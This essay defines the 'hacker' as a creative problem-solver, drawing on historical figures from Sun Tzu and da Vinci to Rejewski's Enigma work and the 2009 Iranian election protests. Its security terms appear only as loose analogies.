A common quick (and lazy) definition has equal parts technology and malicious intent. But truth requires additional consideration. Hackers have been around far longer than John Draper (a.k.a. Captain Crunch – ask your favorite search engine for more on his exploits) or Matthew Broderick in War Games. Perhaps the better approach to a good definition is to look at some examples from history.

Many examples of a good definition can be found in the work of Sun Tzu. He brought a depth of thought to the strategy of war that had not been seen before his time. He realized success in war was not solely a function of physical power. Instead, victory in war was (and remains) dependent on variables both complex and subtle.

Sun Tzu would win battles with smaller forces. For example, he would use terrain and mental attacks to amplify the power of his army. He controlled his enemy's movements with false retreats. He drove them to choke points and applied force at the precise point of weakness (sounds a lot like a buffer overflow attack today).

Sun Tzu would send an assassin to the enemy's camp and kill the opposing general right before the battle (in technology that is called a zero-day attack). The ensuing chaos made victory nearly certain.

Sun Tzu would probably agree with a certain modern "warrior" – "knowing is half the battle". He would use any sources available to learn all he could about himself, his environment, and his enemy. Today a penetration tester might call that "building a profile" on a target. A politician might call that "opposition research".

Leonardo da Vinci is usually credited as a painter, sculptor, architect, polymath, and inventor. Hacker is an appropriate designation to add to the list. The techniques he used were so far ahead of his time that we still marvel at his insight. For example, his art was shaped by his study of optics, perspective, anatomy, and even psychology. He solved problems by adding knowledge from unexpected places. One fine example of a Leonardo hack is his journals. Most of them are written in mirror image cursive. This has often been credited as a type of "security by obscurity" since it would be difficult for a casual glance from an apprentice to reveal the master's secrets. However, a hacker would look at this result and see a great example of mental and physical dexterity. Someone who is left-handed knows the problem of writing left-to-right. The result is generally smudged script and ink-stained hands. So why not change the rules and write right-to-left? The key to the solution is to ignore the rules.

In 1608 Hans Lippershey of Holland asked for a patent for a device he had invented "for seeing far". The label of a hacker could be applied to the Italian Galileo Galilei who took the idea further and eventually built about one hundred different telescopes. He combined mathematics, optics, and good craftsmanship to build a better tool. However, the real "hacking" occurred when he pointed the device at Jupiter and saw a cluster of three "stars" that behaved strangely. When one of them disappeared, he deduced it had gone behind Jupiter. He went on to observe four satellites of Jupiter and even predicted their motions.

In 1932 a twenty-six year-old mathematician named Marian Rejewski joined two others in a secret attempt to deduce the internal workings of an early version of a German encryption machine called Enigma. He had a sudden insight that he tested on some encrypted text. He later described how "From my pencil, as by magic, began to issue numbers designating the connections…" Rejewski brought a methodical, mathematical mind to his problem. Perhaps the best part of his "hack" was the confirmation of his solution. Rejewski tested his results with a copy of the Enigma manual that Hans Thilo Schmidt had managed to smuggle out of Germany. The whole story of how that happened is full of what is today called a "Social Engineering" attack. And even better, inside that manual was a sample message and the corresponding cipher text. To someone trying to break a cipher, this was gold. Today this is an example of taking advantage of unnecessary code left by a sloppy programmer.

Albert Einstein looked at the puzzle of gravity and realized for the previous 250 years we should have been thinking about the curvature of space and not a mysterious force. Thomas Edison tested 1,600 different materials, including a hair from a friend's beard, before he found the right filament for an electric light. Igor Sikorsky was only 19 when he designed and built his first attempt at a helicopter. Problems will yield to the right combination of will, creativity, and intelligence.

In 2009 the Iranian government held elections many of their citizens believed were fraudulent. Protesters spread evidence of government abuse 140 characters at a time on Twitter. Twitter icons from users all over the world turned green in support. "#iranelection" became one of many popular ways to spread news globally faster than the Iranian government could respond. Perhaps we will see a government yield to the power of a social network. That would be a hack worth watching.

The Urban Dictionary has a good definition of a hacker:

"An individual capable of solving complex non-intuitive problems in a seemingly intuitive manner. The processes and techniques used are not necessarily methodical to the observer, but yet achieve results significantly and consistently faster than known experience would predict. A hacker is not defined in terms of intention or purpose, but rather by the talented single-mindedness of method. A hacker is not a hack."

Today we label Steve Wozniak and Charlie Miller and HD Moore and Jeff Moss as modern "hackers". But the hack is only part of their stories. Their creativity and character, when applied to the puzzles they tackle, produce what history will measure.

If you are a CEO with hackers among your employees, or a parent with a hacker for a daughter or son, be thankful for their vision. They see the world differently. They have the potential to advance human history. Nurture their character and give them room to explore. We can only imagine what they will try, discover, tear down, build up, and create.